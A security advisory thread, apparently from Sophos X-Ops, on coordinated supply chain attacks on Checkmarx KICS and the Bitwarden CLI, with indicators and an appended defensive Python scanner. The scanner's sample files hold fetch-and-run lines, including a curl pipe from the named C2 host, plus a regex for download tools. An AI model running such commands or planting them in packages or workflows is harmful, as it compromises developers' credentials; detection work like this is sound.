🚨 Two supply chain attacks, same day, same C2. Sophos X-Ops is aware of reports of attackers hijacking Checkmarx KICS (Docker Hub, Open VSX, GitHub Actions) and the Bitwarden CLI (npm) to steal developer credentials on April 22. Evidence suggests one coordinated campaign. 🧵

Checkmarx KICS: tampered Docker images (5M+ pulls), backdoored VS Code extensions with a commit spoofed to look like it shipped in 2022, and a malicious GitHub Action release. Payload (mcpAddon.js) swept GitHub/npm tokens, cloud creds, SSH keys, and Claude/MCP configs.

Bitwarden CLI: @bitwarden/cli v2026.4.0 distributed for a 93-min window (17:57–19:30 ET). Preinstall hook pulled Bun + payload targeting developer creds, tokens, Cursor and Aider configs. 70K+ weekly downloads. Vault data reportedly not affected.

Novel twist on the Bitwarden side: stolen GitHub tokens were weaponized in-line to inject malicious workflows into victim repos, and the payload created public repos in victim accounts to store AES-encrypted data.

Shared C2: both campaigns exfil to audit.checkmarx[.]cx (94.154.172[.]43).

This follows an incident last month where TeamPCP compromised Checkmarx GitHub Actions alongside Trivy, LiteLLM, and Telnyx in a broader supply chain attack campaign.

If you pulled any affected versions: ▪️ Remove them now ▪️ Rotate GitHub/npm/cloud/SSH creds ▪️ Audit for injected workflows + new public repos in your org ▪️ Rotate secrets in any Claude/Cursor/Aider configs on affected hosts
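An offline sweep for the cleanup steps above, added here as an example rather than Sophos tooling: it flags the affected npm release in a package-lock.json, install-time hooks that fetch code (the tampered Bitwarden CLI used preinstall), and the shared C2 or payload filename in any text such as an injected workflow. The indicators are the ones in this thread; the sample files are constructed.

```python
import json
import re

# Indicators from the thread above (defanged there; plain here so they match file contents).
AFFECTED_NPM = {"@bitwarden/cli": {"2026.4.0"}}
PAYLOAD_FILES = ("mcpAddon.js",)
C2_INDICATORS = ("audit.checkmarx.cx", "94.154.172.43")
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def affected_packages(lock_text):
    """Return (name, version) pairs in a package-lock.json (v2/v3 'packages' map) matching an affected release."""
    hits = []
    for path, meta in json.loads(lock_text).get("packages", {}).items():
        name = path.split("node_modules/")[-1]  # "node_modules/@bitwarden/cli" -> "@bitwarden/cli"
        if meta.get("version") in AFFECTED_NPM.get(name, ()):
            hits.append((name, meta["version"]))
    return hits


def suspicious_install_hooks(package_json_text):
    """Flag npm install-time hooks that download or run code at install, as the tampered CLI's preinstall did."""
    scripts = json.loads(package_json_text).get("scripts", {})
    pattern = re.compile(r"\b(curl|wget|bun)\b|https?://")
    return [hook for hook in INSTALL_HOOKS if hook in scripts and pattern.search(scripts[hook])]


def ioc_matches(text):
    """Return the C2 indicators and payload filenames present in a blob of text (workflow YAML, configs, logs)."""
    return [ioc for ioc in C2_INDICATORS + PAYLOAD_FILES if ioc in text]


# Constructed sample inputs for a dry run; not real artifacts from the incident.
SAMPLE_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "app"},
    "node_modules/@bitwarden/cli": {"version": "2026.4.0"},
    "node_modules/left-pad": {"version": "1.3.0"},
}})
SAMPLE_PKG = json.dumps({"scripts": {
    "preinstall": "curl -fsSL https://example.invalid/bun.sh | sh",  # placeholder URL
    "test": "node test.js",
}})
SAMPLE_WORKFLOW = "name: ci\non: push\njobs:\n  build:\n    steps:\n      - run: curl https://audit.checkmarx.cx/x | node\n"

if __name__ == "__main__":
    print("affected packages:", affected_packages(SAMPLE_LOCK))
    print("suspicious install hooks:", suspicious_install_hooks(SAMPLE_PKG))
    print("IoC matches in workflow:", ioc_matches(SAMPLE_WORKFLOW))
```

Point the three functions at real lockfiles, package.json files and .github/workflows content across the org to cover the "audit for injected workflows" step; a hit means rotate the listed credentials on that host.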

Sophos coverage: ▪️ JS/Steal-EAP ▪️ Linux/Agnt-HZ ▪️ 94.154.172[.]43 and checkmarx[.]cx blocked